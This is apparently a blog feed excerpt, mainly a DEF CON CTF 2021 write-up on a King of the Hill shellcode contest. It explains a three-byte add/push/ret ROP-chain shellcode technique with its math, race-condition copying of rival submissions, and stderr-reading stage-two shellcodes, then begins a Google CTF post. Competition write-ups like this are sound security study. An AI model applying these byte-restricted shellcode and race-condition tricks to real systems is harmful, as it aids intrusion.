
<ul>
  <li>
    <p>Each time a team can submit a hex-encoded shellcode. The shellcode can be written in <code class="language-plaintext highlighter-rouge">x86_64</code>, <code class="language-plaintext highlighter-rouge">arm64</code> or <code class="language-plaintext highlighter-rouge">riscv64</code> architecture.</p>
  </li>
  <li>
    <p>The game will try the shellcode on three architectures each time, and if any of them reads the file content from <code class="language-plaintext highlighter-rouge">/secret</code> and print the content to <code class="language-plaintext highlighter-rouge">stdout</code>, it was deemed as a success.</p>
  </li>
  <li>
    <p>The shellcode is executed using <code class="language-plaintext highlighter-rouge">qemu-user-static</code>, but <code class="language-plaintext highlighter-rouge">chroot</code> into a temporary folder and executed using a non-root user privilege.</p>
  </li>
  <li>
    <p>However, there are some restrictions about the shellcode a team can submit:</p>

    <ul>
      <li>
        <p>At any time of the game, there would be a set of blocked bytes \(B\subseteq \{\texttt{0x00},\texttt{0x01},\cdots,\texttt{0xFF}\}\). The submitted shellcode cannot contain any of the blocked bytes.</p>
      </li>
      <li>
        <p>Comparing to the last accepted submission \(S_l\), the new shellcode \(S_n\) must be either:</p>

        <ul>
          <li>\(\{S_l\dots\} \setminus \{S_n\dots\} \neq \varnothing\) (the new shellcode did not use at least one byte the last accepted shellcode used), or</li>
          <li>\(\vert S_l\vert  &gt; \vert S_n\vert\) (the new shellcode is shorter than the last accepted shellcode in length).</li>
        </ul>

        <p>Where \(S_l\) and \(S_n\) are both strings of shellcodes, and \(\{S\dots\}\) is a set containing bytes used in a shellcode \(S\).</p>
      </li>
    </ul>
  </li>
  <li>
    <p>If the shellcode was then accepted, the newly blocked bytes will be \(B_n = B \cup \left(\{S_l\dots\} \setminus \{S_n\dots\}\right)\). That is, all bytes that’s not used by the new shellcode but used by the old one will be accepted.</p>
  </li>
  <li>
    <p>The team with the latest accepted shellcode would be viewed as “the top of the hill.” The team cannot submit more shellcode if they were the top of the hill.</p>
  </li>
  <li>
    <p>The newly accepted shellcode would then be appended into <code class="language-plaintext highlighter-rouge">history</code>, where the leaderboard is calculated as a reverse of the <code class="language-plaintext highlighter-rouge">history</code>. That is, the team with the latest accepted shellcode would be #1, the team that took the top of the hill before them would be #2, so on and so forth.</p>
  </li>
  <li>
    <p>Each time the Python script would read past information from <code class="language-plaintext highlighter-rouge">history</code>, and write to it if the shellcode is accepted.</p>
  </li>
  <li>
    <p>If a team stayed on the top of the hill for more than 900 seconds (or 15 minutes), then that team would be regarded as a “winner,” and the game would reset. However, one random byte of the winner’s shellcode would be part of the new game’s initial banned bytes \(B\). This applied to all past winners.</p>
  </li>
</ul>

<p>The rules are pretty clear, but we also had some doubts:</p>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">history</code> file was read at the start of the script, and would be overwritten when the new <code class="language-plaintext highlighter-rouge">history</code> was saved, so there were clearly a race condition: open two connections \(A\) and \(B\) at the same time, submit an acceptable shellcode to \(A\) such that the <code class="language-plaintext highlighter-rouge">history</code> is overwritten. However, because the script reads <code class="language-plaintext highlighter-rouge">history</code> at the start of the script, so for \(B\) the <code class="language-plaintext highlighter-rouge">history</code> is still what it used to be (when the connection opened), and accepts a shellcode that may not be acceptable for the current <code class="language-plaintext highlighter-rouge">history</code>. If now we submit a shellcode to \(B\) and it is accepted, \(B\)’s connection would overwrite <code class="language-plaintext highlighter-rouge">history</code> again as if \(A\) never happened.</li>
  <li>There must be a way to sync up the files between each team’s boxes, or everyone would be seeing there own version of <code class="language-plaintext highlighter-rouge">history</code> and there’s no point of the game anymore. There’s also one possibility that everyone is playing on the same server, but that’s highly unlikely according to @riatre.</li>
</ul>

<p>But there’s no way to know before the game started, so we went on with our preparation.</p>

<h2 id="preparation">Preparation</h2>

<p>We first started by writing a few different shellcodes. There were shellcodes that used syscalls directly, shellcodes that called functions statically linked into the binary, and shellcodes that pushed a ROP chain into the stack and returns. Nothing quite out of ordinary here.</p>

<h3 id="three-byte-shellcode">Three-Byte Shellcode</h3>

<p>Until @meowmere sent a shellcode that blew all of us away. In his shellcode, there were only 3 bytes used, <samp>0x05</samp>, <samp>0x50</samp>, and <samp>0xc3</samp>. Quickly we disassembled the shellcode and understood how it worked:</p>

<p>The shellcode was simply pushing a ROP chain onto the stack and returning, but written in a way such that all the values were added up in the register. Therefore there are only three basic instructions used</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">add eax, imm32</code>, which is <samp>0x05</samp> followed by four bytes of the immediate value in four bytes.</li>
  <li><code class="language-plaintext highlighter-rouge">push rax</code>, which is <samp>0x50</samp>, and</li>
  <li><code class="language-plaintext highlighter-rouge">ret</code> which is <samp>0xc3</samp>.</li>
</ul>

<p>And for the <code class="language-plaintext highlighter-rouge">add</code> instruction, the immediate values were consisted of only these 3 bytes, so the shellcode only used these three bytes. Of course the values in the ROP chain contains bytes that doesn’t fall into these 3 bytes, but amazingly, using a combination of number that made up from these 3 bytes and modular arithmetic (which every computer comes with), we can actually add them up to the number we want.</p>

<p>For example, if we want a number <samp>0xd093cffa</samp> to be pushed onto the stack, then we can have:</p>

<pre><code class="language-asm">add eax, 0xc350c305
add eax, 0xc350c305
add eax, 0xc350c350
add eax, 0xc350c350
add eax, 0xc350c350
push eax
</code></pre>

<p>And the assembled shellcode for this would consist only of the aforementioned 3 bytes. This works because</p>

\[(\text{c350c305})_{\text{hex}} \cdot 2 + (\text{c350c350})_{\text{hex}} \cdot 3 \equiv (\text{d093cffa})_\text{hex} \mod 2^{32}\]

<p>I’m not good at number theory, so I can’t tell if the combination of these 3 bytes into a 32-bit number can add up to any number within the 32-bit range if mod \(2^{32}\). That being said, it is proven that it <em>can</em> add up to some number, so it’s time for some math.</p>

<h4 id="find-values-that-adds-up-to-the-target-one">Find Values that Adds Up to the Target One</h4>

<p>We have an alphabet \(A\) that consists of numbers from \([0,\vert A \vert)\), a set of usable symbols \(B \subseteq A\), and a target string \(T\) of length \(s\). We represent \(T\) as a base-\(\vert A\vert\) number, that is, \(T = \sum_{i=0}^{s-1} {\vert A\vert }^{i} T_i\).</p>

<p>We want to find a list of numbers \([n_1, n_2, \cdots, n_i]\) such that \(T \equiv \sum_i n_i \mod \vert A\vert ^s\) and \(n_i=\sum_{j=0}^{s-1} \vert A\vert ^{j}\cdot n_{ij}, n_{ij} \in B\), i.e. $n_i$ consists only symbols from \(B\) in their base-\(\vert A\vert\) representation as a string.</p>

<p>Although it is possible to generate all possible values of \(n_i\)—such a set has a size of \(\vert B\vert ^s\)—it is very hard to find a combination of them that adds up to \(T\). If using breadth-first search, on the search depth \(d\), there will have \(O\left(\vert B\vert ^{sd}\right)\) such many values, and there could be as many as \(\vert A\vert ^s\) of different combinations and only few of them is what we need. Therefore, we need to find a way to search for these values quickly.</p>

<p>We have</p>

\[\begin{align}
T &amp;\equiv \sum_i n_i &amp;\mod |A|^s\\
&amp;\equiv \sum_i\sum_{j=0}^{s-1} |A|^j\cdot n_{ij} &amp;\mod |A|^s\\
&amp;\equiv \sum_{j=0}^{s-1} \left(|A|^j \cdot \sum_{k=1}^{|B|} b_k  c_{jk} \right)&amp;\mod |A|^s&amp;&amp; \text{where }c_{jk} = \sum_i[n_{ij} = b_k]\\
\end{align}\]

<p>where \(n_{ij}\) is the \(j\) the symbol of string \(n_i\). A constraint we must add is</p>

\[\exists i \in \mathbb{Z}^+, \forall j \in [0, s), \sum_{k=1}^{|B|} c_{jk} = i\]

<p>That is, we must have the same number of symbols on each position on the string, otherwise we must use \(0\) to pad the string which might not be in \(B\). To find the optimal answer (one that produces shortest \(n_i\) list), we just need to find such a minimum \(i\). Also, it is easy to see that \(i\) has an upper bound of \(\vert A\vert \cdot \vert B\vert\), since each symbol on each position need only appear at most \(\vert A\vert\) times.</p>

<p>Notice that we represented \(T\) as a number, that is:</p>

\[T =\sum_{j=0}^{s-1}|A|^j \cdot T_j \equiv\sum_{j=0}^{s-1} \left(|A|^j \cdot \sum_{k=1}^{|B|} b_k  c_{jk} \right)\mod |A|^s\]

<p>where \(T_j \in A\). That means we have</p>

\[\begin{align}
T_0 &amp;\equiv\sum_{k=1}^{|B|} b_k  c_{0k} &amp;\mod |A|\\
T_1 &amp;\equiv \sum_{k=1}^{|B|} b_k  c_{1k} + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k  c_{0k}}{|A|}\right\rfloor&amp;\mod |A|\\
 T_2 &amp;\equiv \sum_{k=1}^{|B|} b_k  c_{2k} + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k  c_{0k}}{|A|^2} \right\rfloor + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k  c_{1k}}{|A|}\right\rfloor&amp;\mod |A|\\
\dots\\
T_d &amp;\equiv \sum_{p=0}^d \left\lfloor \frac{\sum_{k=1}^{|B|} b_k  c_{pk}}{|A|^p} \right\rfloor &amp;\mod |A|
\end{align}\]

<p>Now we have turned the task from brute-forcing a list of $n_i$s into brute-forcing $c_{jk}$s. For each byte of \(T\), we have at most \(\vert A\vert ^{\vert B\vert }\) different combination of \(\sum_{k=1}^{\vert B\vert } b_k  c_{jk} \mod \vert A\vert\), and assuming they distributes evenly over the range, there are \(\approx \vert A\vert ^{\vert B\vert -1}\) ways that they sums up to be any specific symbol, which makes the search space much more acceptable when \(\vert B\vert\) is small. Furthermore, we can cache all values that different \(\sum_{k=1}^{\vert B\vert } b_k  c_{jk} \mod \vert A\vert\) has, such that we can quickly lookup the value in reverse. The overall search complexity is  \(O\left(s\cdot\vert A\vert ^{\vert B\vert -1}\right)\) (a very loose bound).</p>

<p>The pseudocode for the above procedure, without optimization:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">input</span> <span class="n">Target</span><span class="p">,</span> <span class="n">UsableSymbols</span><span class="p">,</span> <span class="n">Alphabet</span>
<span class="n">a</span> <span class="p">:</span><span class="o">=</span> <span class="nf">size</span><span class="p">(</span><span class="n">Alphabet</span><span class="p">)</span>
<span class="n">b</span> <span class="p">:</span><span class="o">=</span> <span class="nf">size</span><span class="p">(</span><span class="n">UsableSymbols</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">Search</span><span class="p">(</span><span class="n">T</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="n">depth</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
  <span class="k">if</span> <span class="n">depth</span> <span class="o">==</span> <span class="nf">length</span><span class="p">(</span><span class="n">Target</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">path</span>
  <span class="n">end</span>
  <span class="k">for</span> <span class="nf">each </span><span class="p">(</span><span class="n">c_1</span><span class="p">,</span> <span class="n">c_2</span><span class="p">,</span> <span class="p">...,</span> <span class="n">c_b</span><span class="p">)</span> <span class="n">such</span> <span class="n">that</span>
      <span class="nf">sum</span><span class="p">(</span><span class="n">c_1</span><span class="p">,</span> <span class="p">...)</span> <span class="o">==</span> <span class="n">i</span> <span class="ow">and</span>
      <span class="p">({</span><span class="n">c_1</span><span class="p">,</span> <span class="p">...}</span> <span class="o">&lt;</span><span class="n">dot</span> <span class="n">product</span><span class="o">&gt;</span> <span class="n">UsableSymbols</span><span class="p">)</span> <span class="n">mod</span> <span class="n">b</span> <span class="o">==</span> <span class="n">T</span> <span class="n">mod</span> <span class="n">b</span>
    <span class="n">answer</span> <span class="p">:</span><span class="o">=</span> <span class="nc">Search</span><span class="p">((</span><span class="n">T</span> <span class="o">-</span> <span class="p">{</span><span class="n">c_1</span><span class="p">,</span> <span class="p">...}</span> <span class="n">dot</span> <span class="n">UsableSymbols</span><span class="p">)</span> <span class="n">mod</span> <span class="n">b</span> <span class="o">/</span> <span class="n">a</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="n">depth</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="nf">append</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="p">(</span><span class="n">c_1</span><span class="p">,</span> <span class="p">...)))</span>
    <span class="k">return</span> <span class="n">answer</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">nil</span>
  <span class="n">end</span>
  <span class="k">return</span> <span class="n">nil</span>
<span class="n">end</span>

<span class="k">for</span> <span class="n">i</span> <span class="k">from</span> <span class="mi">1</span> <span class="n">to</span> <span class="n">a</span> <span class="o">*</span> <span class="n">b</span>
  <span class="n">answer</span> <span class="o">=</span> <span class="nc">Search</span><span class="p">(</span><span class="n">Target</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">[])</span>
  <span class="k">return</span> <span class="n">answer</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">nil</span>
<span class="n">end</span>
<span class="n">output</span> <span class="sh">"</span><span class="s">no answer</span><span class="sh">"</span>
</code></pre></div></div>

<p>In this specific case, our alphabet are possible hex values within a byte, i.e. <samp>0x00</samp>, <samp>0x01</samp>, …, <samp>0xff</samp>, so 256 of them. And our usable symbols depend on what operations we need to do. In this case of <code class="language-plaintext highlighter-rouge">add eax</code>, <code class="language-plaintext highlighter-rouge">push rax</code> and <code class="language-plaintext highlighter-rouge">ret</code>, our usable bytes are <samp>0x05</samp>, <samp>0x50</samp>, and <samp>0xc3</samp> respectively. Therefore, using this algorithm, given a number \(T\) within the range of \(2^{32} = 256^4\), we are able to find a way to build a minimal list of numbers such that they sum up to be the target number and they only contain <samp>0x05</samp>, <samp>0x50</samp>, and <samp>0xc3</samp> in their 4-byte hex representation. Let \(f(T)\) be such the optimal (minimal) size of the list for a given \(T\).</p>

<p>Here’s my script for <a href="https://gist.github.com/superfashi/9d1ccea3513b7f52951d7b88da052855">adding values consist of limited bytes to a target number using modular arithmetic (github.com)</a>.</p>

<h4 id="construct-an-addpush-rop-chain">Construct an ADD/PUSH ROP Chain</h4>

<p>For a normal hand-written ROP chain, the values on stack are fixed. However, in a binary executable, there actually could have multiple occurrence of the same instruction like <code class="language-plaintext highlighter-rouge">pop rax; ret</code> or <code class="language-plaintext highlighter-rouge">mov dword ptr [rdi], edx; ret</code>. It is the same to use any of the address that contains our wanted instruction in an ROP chain, but since our target now is to minimize the length of converted ROP chain, we can look for an optimal combination of values such that they produce the shortest ROP chain after converting them to the <code class="language-plaintext highlighter-rouge">add/push</code> format.</p>

<p>Notice that the current <code class="language-plaintext highlighter-rouge">rax</code> value is dependent on the last value, for example, our shellcode looks like this:</p>

<pre><code class="language-asm"># rax = 0
add rax, 0x50505050
add rax, 0x50505050
...
push rax # rax = v1
...      # somehow add v2 - v1 to rax
push rax # rax = v2
</code></pre>

<p>The <code class="language-plaintext highlighter-rouge">add</code> operations between the first <code class="language-plaintext highlighter-rouge">push</code> and second <code class="language-plaintext highlighter-rouge">push</code> depends on both values of \(v1\) and \(v2\). Let’s make this more formal:</p>

<p>Given a ROP chain of \(n\) values that need to be pushed onto the stack, we have a list of sets \(N = \left[V_1, V_2, \cdots, V_n\right]\) where \(V_i\) is a set of values that, no matter which being pushed onto the stack, the ROP chain has the same effect. We want to find a solution \((v_1, v_2, \cdots, v_n) \in V_1 \times V_2 \times \cdots \times V_n\) such that</p>

\[\sum_{i=1}^n f\left(v_i - v_{i-1} \mod |A|^s\right)\]

<p>is minimal (where \(v_0\) is the initial <code class="language-plaintext highlighter-rouge">rax</code> value). A brute-force method such as going through all such possible \(n\)s is not ideal, which requires \(\prod_{i=1}^n \vert S_i\vert\) such many tries. A greedy approach trying to minify \(f\left(v_i - v_{i-1} \mod \vert A\vert ^s\right)\) going through each \(i\) is clearly not optimal. It’s time for dynamic programming then.</p>

<p>Let \(F_i(v)\) be the minimal number of <code class="language-plaintext highlighter-rouge">add</code> instructions when the \(i\)th value on the stack is \(v\), We have</p>

\[\begin{align}
F_{i+1}(v) &amp;= 
\min_{(v_1, \cdots, v_i) \in V_1 \times \cdots \times V_i} 
\left( f\left(v -v_{i} \mod |A|^s\right) +  \sum_{j=1}^{i} f\left(v_{j} - v_{j-1} \mod |A|^s\right)\right)\\
&amp;= \min_{v_i \in V_i} 
\left(f\left(v -v_{i} \mod |A|^s\right) + 
\min_{(v_1, \cdots, v_{i-1}) \in V_1 \times \cdots \times V_{i-1}} 
\left( f\left(v_i-v_{i-1} \mod |A|^s\right) + \sum_{j=1}^{i-1} f\left(v_{j} - v_{j-1} \mod |A|^s\right)\right)\right)\\
&amp;= \min_{v_i \in V_i} \left( f\left(v -v_{i} \mod |A|^s\right) + F_i(v_i)\right)

\end{align}\]

<p>And our final answer is to look for \(\min_{v_n \in V_n} F_n(v_n)\). The time complexity of this DP is</p>

\[\Theta\left(\sum_{i=1}^n \left(\sum_{(v_i, v_{i-1}) \in V_i \times V_{i-1}} f^t\left(v_i - v_{i-1} \mod |A|^s\right)\right)\right)\]

<p>where \(f^t(v)\) is the time needed for the \(f\) algorithm to run on input \(v\)​.</p>

<hr />

<p>Therefore, using this strategy, we were able to generate a three-byte shellcode that has the minimal length. That’s not the end. We are well known the rules that a winner’s shellcode would be banned, so there are some alternatives to the method:</p>

<ul>
  <li>If <samp>0x05</samp> is banned, we could use <samp>0x2d</samp> (<code class="language-plaintext highlighter-rouge">sub eax</code>) or <samp>0x15</samp> (<code class="language-plaintext highlighter-rouge">adc eax</code>). Although the analysis above would be a bit different.</li>
  <li>If <samp>0x50</samp> is banned, we could use <samp>0x81 0xc3</samp> (<code class="language-plaintext highlighter-rouge">add ebx</code>) and <samp>0x53</samp> (<code class="language-plaintext highlighter-rouge">push ebx</code>).</li>
  <li>If <samp>0xc3</samp> is banned, we could use <samp>0xc2</samp>, since <code class="language-plaintext highlighter-rouge">ret 0</code> is the same as <code class="language-plaintext highlighter-rouge">ret</code>.
    <ul>
      <li>If <samp>0xc2</samp> is banned, we could use <samp>0xff 0xe0</samp> (<code class="language-plaintext highlighter-rouge">jmp eax</code>).</li>
    </ul>
  </li>
</ul>

<p>And for all the above, we could replace the register <code class="language-plaintext highlighter-rouge">rax</code> with any other register and the method should still work. Also, this analysis applies for a four-byte set as well.</p>

<h4 id="phishing-strategy">Phishing Strategy</h4>

<p>It all sounds fun and games, until you remembered that the rule said any shellcode that doesn’t use one of the bytes the current top-of-the-hill shellcode had could be accepted. So everything we’ve been doing is in vain!?</p>

<p>Well, if we could ban every single byte except for these three bytes, then obviously we could take the top of the hill and win without a doubt. However, we couldn’t submit again if we were at top of the hill, so it’s nearly impossible to ban the bytes we want to ban. Or was it?</p>

<p>The first idea came to mind was to collude with some other team. If another team could submit a shellcode that uses all the bytes, then our three-byte shellcode would wipe every other bytes out. However, letting alone the potential rules that would break, it’s clear that no team would collaborate with us on this.</p>

<p>Then a thought came through my mind: it is totally possible for us to ban all the other bytes without anyone’s cooperation—the other teams would be helping us no matter they want to or not—it’s time for phishing!</p>

<p>The idea was dead simple:</p>

<ul>
  <li>We prepare a few shellcode that use as few number of different bytes as possible. The shellcodes CANNOT contain the three bytes we need to use. The used bytes in these shellcodes should overlap each other as little as possible.</li>
  <li>At each round, we check the current banned bytes, and pick the shellcode that does not contain the banned bytes out. Then, <strong>append all other bytes to the end of the shellcode</strong>, but don’t include the banned ones. For the three-bytes we need, there are two cases:
    <ul>
      <li>If the current top-of-the-hill shellcode include that byte, then also append that byte to the end,</li>
      <li>Otherwise, don’t include that byte in our submitted shellcode.</li>
    </ul>
  </li>
  <li>Once we submitted that shellcode, we’ll just have to wait for another team to submit whatever shellcode they have, and then submit our three-byte shellcode. Then, all the other bytes should be banned except for those three bytes we used.</li>
</ul>

<p>Of course, if one of our three bytes was already banned, then this couldn’t work. But overall this seemed like a really good strategy. It’s almost like phishing because it would result in other teams submitting shellcode that is actually used against them, while they had no idea what happened.</p>

<blockquote>
  <p>As for how it really went in the real game, I’ll leave to a later part.</p>
</blockquote>

<h3 id="copying-homework">Copying Homework</h3>

<p>Recall the race condition we talked about earlier, so another group of our KoH players were thinking about how to exploit it. The game also features an in-game leaderboard, where everyone can see each other’s accepted shellcode. We then had a great idea of how to utilize this race condition and the leaderboard:</p>

<ol>
  <li>Start two threads that connects to the game service simultaneously, so they would have the same view of the history.</li>
  <li>Thread 1 keeps the connection alive, while thread 2 constantly reconnect to check if there’s a change in leaderboard.</li>
  <li>If thread 2 detected a new top-of-the-hill shellcode, it send that shellcode to thread 1.</li>
  <li>Thread 1 then wait until seconds before the timeout of the connection (30 seconds), and submit that shellcode.</li>
</ol>

<p>A diagram looks like this:</p>

<p><img src="/assets/images/defcon-ctf-2021/copy-diagram.png" alt="copy-diagram" /></p>

<p>This would work because Thread 1 had an old view of <code class="language-plaintext highlighter-rouge">history</code>, so if team B’s shellcode could be accepted for that version of <code class="language-plaintext highlighter-rouge">history</code>, then definitely we could use the same shellcode as well. This would also wipe Team A’s submission out of existence. A really powerful strategy indeed.</p>

<h4 id="countermeasure">Countermeasure</h4>

<p>The way to counter this (of course there is one), is that for the submitting team, they had to do exactly the same thing.</p>

<blockquote>
  <p>Although we didn’t quite think of this during the preparation, for the sake of consistency, I’ll put it here.</p>
</blockquote>

<p>When submitting a new shellcode, the team had to open two connections, one submitting shellcode immediately, and another should wait until the timeout to submit. This would work because:</p>

<p>Suppose another team A who’s trying to steal the shellcode opens a connection at \(t_0\). So for that team, the shellcode it can steal is submitted in the time range \((t_0, t_0+t_{\text{close}}]\) where \(t_{\text{close}}\) is the connection timeout. Suppose we submit our shellcode at \(t_1\), where \(t_1 \in (t_0, t_0+t_\text{close}]\), then the best they can do is to resubmit the shellcode at time \(t_0+t_\text{close}\). However, we then resubmit our shellcode at \(t_1+t_\text{close}\), so our record will still be on the leaderboard. Notice that no matter how close \(t_0\) and \(t_1\) can be, since \(t_0 &lt; t_1\) because the stealing team must read <code class="language-plaintext highlighter-rouge">history</code> before our submission, it must be \(t_0+t_\text{close}&lt; t_1+t_\text{close}\).</p>

<p>Therefore as long as we submitted our shellcode twice using the strategy, we could make sure that our shellcode wouldn’t be stolen.</p>

<h3 id="some-other-methods">Some Other Methods</h3>

<h4 id="a-repository-of-shellcodes">A Repository of Shellcodes</h4>

<p>We also put all of the possible shellcodes into a git repository, and we wrote a script to pick the shellcodes from the repository to submit with some rules and heuristics:</p>

<ul>
  <li>First we cross out of the shellcodes that couldn’t possibly be accepted either because of banned bytes or they weren’t better than the current top-of-the-hill.</li>
  <li>Then for each of the remaining shellcode, we pick the one that if accepted, would ban most number of bytes.</li>
  <li>In case of a draw, we submit the shellcode that’s shortest in length.</li>
</ul>

<p>Any shellcode we encounter during the game would also be added into this repository.</p>

<h4 id="fuzzing">Fuzzing</h4>

<p>Remembered the fuzzing we talked about in <em>zero-is-you</em>? Now it’s back. I didn’t work on this so I know not much about the details, but essentially it would take the current top-of-the-hill and try to fuzz out a shellcode that is shorter than the current one.</p>

<h4 id="using-existing-tools">Using Existing Tools</h4>

<p>There were clearly CTFs before that required inputting shellcode using only printable characters, so definitely there were existing tools to generate/transform shellcodes into limited character set. We found some of the tools and they really worked pretty well.</p>

<h2 id="game-start">Game Start</h2>

<p>Game started, the phishing strategy worked right away and we blocked all the bytes, just to see that the <code class="language-plaintext highlighter-rouge">history</code> was rewritten by some other teams. At that time we didn’t figure out the <em>countermeasure</em> yet, so that’s that. Nonetheless, copying homework did work and we were on the top-of-the-hill for a moment.</p>

<p>We didn’t plan to use the 3-byte strategy until we get a reasonable large banned bytes set. However, one thing we missed is that we put our 3-byte shellcode into the repository as well, so the script automatically submitted that. Oh well, that’s bad. Not only our trump card was leaked and everyone could figure out how this worked, but we submitted when there were still a lot of acceptable bytes, so anyone could take us down with an easy shellcode.</p>

<p>Furthermore, it’s obvious that we were the only ones figured out how to use only a 3-byte set (not exactly, more on that later) to construct a shellcode, but everyone noticed the race condition and started to copy each other’s homework. It’s really sad to see we submitted a shellcode, just a few seconds later we disappeared from the leaderboard and being replaced by some other team with the same shellcode.</p>

<p>That being said, the game was fair to everyone, we indeed successfully copied others’ homework as well, so no real complains here.</p>

<h3 id="unexpected-reset">Unexpected Reset</h3>

<p>We were the winner for the first round, everything was going smoothly, until it wasn’t.</p>

<p>On the start of the second round, it all seemed normal as teams submitting different shellcode again, but then, out of nowhere, a reset happened. It was not a reset as if someone became a winner again, it was a reset as if the entire <code class="language-plaintext highlighter-rouge">history</code> was wiped out. We can tell because we were no longer under the <em>Renowned ancestors</em> section. We thought maybe it was a sync issue, that there were some problems with the sync script that messed everything up. But the weirdest thing is yet to come.</p>

<p>StarBugs’s <strong>true</strong> 3-byte shellcode blew our mind. <code class="language-plaintext highlighter-rouge">69 89 73</code> was immediately the meme in the Discord server. There was no way, we thought, that this short of a shellcode would do the things the game asked us to do. We were certain that, either the syncing script messed something up, or it cut off a part of the shellcode away.</p>

<p>However, OOO said that “the sync bot [was] working just fine,” so it made me think it might be another possibility: they must had some Linux kernel chroot escape zero-day, or else how did you explain the situation?</p>

<p>Anyway, <code class="language-plaintext highlighter-rouge">698973</code> didn’t stay on the top for a long time, because there were still plenty of acceptable bytes to use, so other team’s were able to use the remaining bytes to write something and kicked StarBugs out. It might be a fluke then, we thought, so we quickly went back to the battlefield.</p>

<h3 id="read-from-stderr">Read From Stderr</h3>

<p>It was all going pretty normal for a few rounds, but something weird happened again. This time, PPP threw out <code class="language-plaintext highlighter-rouge">000000ca00080091210000d4</code>, and we were all like, what? Soon enough, <code class="language-plaintext highlighter-rouge">698973</code> came back, and <code class="language-plaintext highlighter-rouge">699973</code> appeared. We were all dumbstruck. A quick run of the code on our local environment showed clearly that these shellcode doesn’t pass the test, so what trickery were they playing with?</p>

<p>Not before long, my teammate noticed something odd. If you run these shellcodes, the execution would actually take longer for some reason. It would stuck at one architecture and then timed out after 5 seconds. That’s a bit weird. Then, we noticed that if you were to press <kbd>Enter</kbd>, the shellcode would exit immediately. This was a sign of accepting input!</p>

<p>The questions were then, what was the input format and why can you input something. The second one isn’t hard to figure out, as we finally saw that in subprocess execution, the <code class="language-plaintext highlighter-rouge">stderr</code> was redirected as <code class="language-plaintext highlighter-rouge">1</code>, but you could actually read data from that. This is really wild but not something we haven’t seen before.</p>

<p>While some were investigating how the shellcode itself worked, we took an educated guess that it just accepted raw shellcode. So quickly we wrote a shellcode using that architecture, input it when the shellcode waited for input, and it really did work.</p>

<p>After that and some digging into <code class="language-plaintext highlighter-rouge">RISC V</code> and <code class="language-plaintext highlighter-rouge">ARM64</code> architecture specifications, we figured out how the shellcode could read from input while only had 3 bytes.</p>

<blockquote>
  <p>I wasn’t focused on this so I didn’t know how it actually worked. The reader can refer to some other fantastic write-ups.</p>
</blockquote>

<h3 id="phishing-worked">Phishing Worked</h3>

<p>An hour or so before the game end, finally the phishing worked and the accepted bytes was limited to only 3 bytes. We were so happy, just to found out that someone copied our homework.</p>

<p>That’s a really bad news because we were too naïve and submitted our optimal solutions already. Ends up that we have to look for another set of ROP chain that would result in a shorter shellcode after converting it into an ADD/PUSH ROP chain.</p>

<p>After a few minutes, we found one, and we were really excited, so someone just submitted the shellcode by hand. And you know what happened? Our homework was being copied once again. Oh big F.</p>

<p>Finally we found another one, and this time we took our lesson. We finally figured out the countermeasure (mentioned above), and submitted it the <em>right</em> way. We then start our 15 minutes countdown, while preparing for the next three-bytes payload.</p>

<p>However, an unexpected reset happened once again before we reached 15 minutes, and we didn’t even have enough time to start running our phishing script. Welp, that’s the end for phishing I guess.</p>

<h3 id="to-the-end">To the End</h3>

<p>It was then basically a battle for the shellcode that read from <code class="language-plaintext highlighter-rouge">stderr</code>. Since we figured out how it worked, we used this technique as well. At the end, PPP throw out the final bomb, shellcode <code class="language-plaintext highlighter-rouge">73 00</code>, marking probability the shortest shellcode that could be accepted.</p>

<p>Still we didn’t figure out why the unexpected resets happened. Was it some other teams’ doing things to alter <code class="language-plaintext highlighter-rouge">history</code>, or just a bad sync script made by OOO. Probably we could figure it out by digging into the pcaps, but I’ll leave that to the reader.</p>

<h1 id="epilogue">Epilogue</h1>

<p>Writing this took way longer than I planned, but I’m glad I had most of the details laid out, as a memorial to this precious experience. I genuinely had a lot of fun playing with Tea Deliverers, hope they will still bring me in next year.</p>

<p>Finally, here’s an overall ranking for KoH:</p>

<p><img src="/assets/images/defcon-ctf-2021/koh-score.png" alt="koh-score" /></p>

<p>Thank you for reading!</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="CTF" /><category term="Hacking" /><category term="KoH" /><summary type="html"><![CDATA[Please call me the king of King of the Hill.]]></summary></entry><entry><title type="html">Google CTF 2021</title><link href="http://0.0.0.0/blog/google-ctf-2021/" rel="alternate" type="text/html" title="Google CTF 2021" /><published>2021-07-19T07:40:00-04:00</published><updated>2021-07-19T07:40:00-04:00</updated><id>http://0.0.0.0/blog/google-ctf-2021</id><content type="html" xml:base="http://0.0.0.0/blog/google-ctf-2021/"><![CDATA[<p>This weekend I was planning to play <em>The Great Ace Attorney: Adventures</em> with my SO.
<!--more--></p>

<p>Yet here I am, and she was pretty angry about that.</p>

<h1 id="cpp">CPP</h1>

<p><img src="/assets/images/google-ctf-2021/cpp1.png" alt="cpp.c" /></p>

<p>So <em>CPP</em> stands for <em>C Pre-Processor</em>, clearly seen from the compiler’s warning message <code class="language-plaintext highlighter-rouge">-Wcpp</code>.</p>

<h2 id="eyeballing-the-code">Eyeballing the Code</h2>

<p>Open the file we see a bunch of pre-processing macros. In fact, most of the code are macros, and if we scroll to the bottom we can see a tiny bit of actual C code that will compile if the pre-processing passed without errors.</p>

<p>It is pretty obvious that we need to somehow figure out the running process of the pre-processor, and the flag we are looking for is hidden within.</p>

